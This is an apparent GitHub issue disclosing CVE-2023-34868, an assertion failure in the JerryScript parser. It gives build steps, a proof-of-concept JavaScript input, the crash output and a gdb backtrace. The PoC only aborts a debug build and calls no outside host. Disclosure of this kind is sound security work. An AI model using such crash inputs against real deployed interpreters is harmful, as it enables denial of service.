Headline
CVE-2023-34868: Assertion 'context_p->token.type != LEXER_RIGHT_PAREN' failed at ./jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_for_statement_start) · Issue #5083 · jerryscript-project/jerryscript
Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the parser_parse_for_statement_start at jerry-core/parser/js/js-parser-statm.c.
JerryScript revision
Commit: 05dbbd1
Version: v3.0.0
Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build steps
python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
Test casetestcase
var r = { } ; var t = [ r , r , r , r , r , r , r , r , r , r , r , r , r , r , r ] ; var a = [ ] ; const e = 8 ; for ( var n = 0 ; n < 8 ; ++ n ) { for ( var o = 0 ; o < t . length ; ++ o ) { a . push ( String . prototype . indexOf . call ( t [ n ] , " object " ) ) ; } } a [ 8 ] = a = [ ] ; 8 * t , f . length ; var c = class extends c { static { } ; } ; for ( var n = 0 ; n < a . length ; ++ n ) { var f = { } , t = f ; r = 0 ; r += a [ n ] ; 1 ; }
// poc.js var c = class extends c { static { } ; } ; for ( var n = 0 ; n < a . length ; ++ n ) { r += a [ n ] ; }
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'context_p->token.type != LEXER_RIGHT_PAREN' failed at ./jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_for_statement_start):1502.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted
Backtrace
(gdb) bt
#0 0xf7fcfd99 in __kernel_vsyscall ()
#1 0xf7ca4276 in raise () from /lib32/libc.so.6
#2 0xf7c8c3f7 in abort () from /lib32/libc.so.6
#3 0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION)
at ./jerryscript/jerry-port/common/jerry-port-process.c:29
#4 0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION)
at ./jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x08260d64 in jerry_assert_fail (assertion=0x8479a60 <str> "context_p->token.type != LEXER_RIGHT_PAREN",
file=0x84789e0 <str> "./jerryscript/jerry-core/parser/js/js-parser-statm.c",
function=0x8479b20 <__func__.parser_parse_for_statement_start> "parser_parse_for_statement_start", line=1502)
at ./jerryscript/jerry-core/jrt/jrt-fatals.c:83
#6 0x083d5567 in parser_parse_for_statement_start (context_p=<optimized out>)
at ./jerryscript/jerry-core/parser/js/js-parser-statm.c:1502
#7 parser_parse_statements (context_p=<optimized out>)
at ./jerryscript/jerry-core/parser/js/js-parser-statm.c:2851
#8 0x08284a26 in parser_parse_source (source_p=0xffffd030, parse_opts=<optimized out>, options_p=0xffffd100)
at ./jerryscript/jerry-core/parser/js/js-parser.c:2280
#9 0x08282c70 in parser_parse_script (source_p=0xffffd030, parse_opts=0, options_p=0xffffd100)
at ./jerryscript/jerry-core/parser/js/js-parser.c:3326
#10 0x08129a7d in jerry_parse_common (source_p=0xffffd030, options_p=<optimized out>, parse_opts=0)
at ./jerryscript/jerry-core/api/jerryscript.c:412
#11 0x08129698 in jerry_parse (source_p=<optimized out>, source_size=<optimized out>, options_p=<optimized out>)
at ./jerryscript/jerry-core/api/jerryscript.c:480
#12 0x083ea952 in jerryx_source_parse_script (path_p=<optimized out>)
at ./jerryscript/jerry-ext/util/sources.c:52
#13 0x083eac12 in jerryx_source_exec_script (path_p=0xffffd5da "poc.js")
at ./jerryscript/jerry-ext/util/sources.c:63
#14 0x0812162d in main (argc=<optimized out>, argv=<optimized out>)
at ./jerryscript/jerry-main/main-desktop.c:156
(gdb)
Credits: @Ye0nny, @EJueon of the seclab-yonsei.